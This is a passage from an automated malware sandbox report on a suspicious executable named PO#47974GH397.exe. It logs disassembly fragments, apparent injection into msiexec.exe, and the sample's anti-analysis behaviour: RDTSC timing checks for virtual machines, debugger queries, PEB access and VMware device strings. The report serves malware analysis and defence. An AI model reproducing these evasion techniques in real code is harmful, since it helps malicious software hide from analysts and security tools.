          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041ADA2 push eax; ret 10_2_0041ADA8
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041ADAB push eax; ret 10_2_0041AE12
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00414E09 pushfd ; ret 10_2_00414E39
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041AE0C push eax; ret 10_2_0041AE12
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0041BF14 push dword ptr [2E33947Ah]; ret 10_2_0041C174
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00862D56 push ecx; ret 10_2_00862D69
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0129D0D1 push ecx; ret 10_2_0129D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0474D0D1 push ecx; ret 14_2_0474D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C8CA push cs; ret 14_2_0059C8D1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C184 push dword ptr [2E33947Ah]; ret 14_2_0059C174
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C2FA push ecx; ret 14_2_0059C2FF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059C288 push CCFB6AF2h; ret 14_2_0059C2AB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_005992B5 push eax; iretd 14_2_005992BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00594CED push ecx; ret 14_2_00594CEE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059AD55 push eax; ret 14_2_0059ADA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059ADAB push eax; ret 14_2_0059AE12
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059ADA2 push eax; ret 14_2_0059ADA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00594E09 pushfd ; ret 14_2_00594E39
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059AE0C push eax; ret 14_2_0059AE12
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0059BF14 push dword ptr [2E33947Ah]; ret 14_2_0059C174
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO#47974GH397.exeRDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#47974GH397.exeRDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000005883C4 second address: 00000000005883CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 000000000058875E second address: 0000000000588764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00408690 rdtsc 10_2_00408690
          Source: C:\Windows\explorer.exe TID: 6244Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6236Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00872595 FindFirstFileExW,0_2_00872595
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00872595 FindFirstFileExW,10_2_00872595
          Source: explorer.exe, 0000000B.00000000.748615085.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.755191974.000000000A897000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.754266906.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000000.750256500.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.754266906.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.748615085.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 0000000B.00000000.754376302.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000B.00000000.754437763.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 0000000B.00000002.937213189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO#47974GH397.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO#47974GH397.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00408690 rdtsc 10_2_00408690
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_004098F0 LdrLoadDll,10_2_004098F0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_0086D112 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0086D112
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00861B90 mov eax, dword ptr fs:[00000030h]0_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00861B90 mov eax, dword ptr fs:[00000030h]0_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_0087120F mov eax, dword ptr fs:[00000030h]0_2_0087120F
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00886323 mov eax, dword ptr fs:[00000030h]0_2_00886323
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00886C94 mov eax, dword ptr fs:[00000030h]0_2_00886C94
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00886CCF mov eax, dword ptr fs:[00000030h]0_2_00886CCF
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00886D32 mov eax, dword ptr fs:[00000030h]0_2_00886D32
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_0086AF6B mov eax, dword ptr fs:[00000030h]0_2_0086AF6B
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0087120F mov eax, dword ptr fs:[00000030h]10_2_0087120F
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00861B90 mov eax, dword ptr fs:[00000030h]10_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00861B90 mov eax, dword ptr fs:[00000030h]10_2_00861B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0086AF6B mov eax, dword ptr fs:[00000030h]10_2_0086AF6B
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01264120 mov eax, dword ptr fs:[00000030h]10_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01264120 mov eax, dword ptr fs:[00000030h]10_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01264120 mov eax, dword ptr fs:[00000030h]10_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01264120 mov eax, dword ptr fs:[00000030h]10_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01264120 mov ecx, dword ptr fs:[00000030h]10_2_01264120
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127513A mov eax, dword ptr fs:[00000030h]10_2_0127513A
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_0127513A mov eax, dword ptr fs:[00000030h]10_2_0127513A
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01249100 mov eax, dword ptr fs:[00000030h]10_2_01249100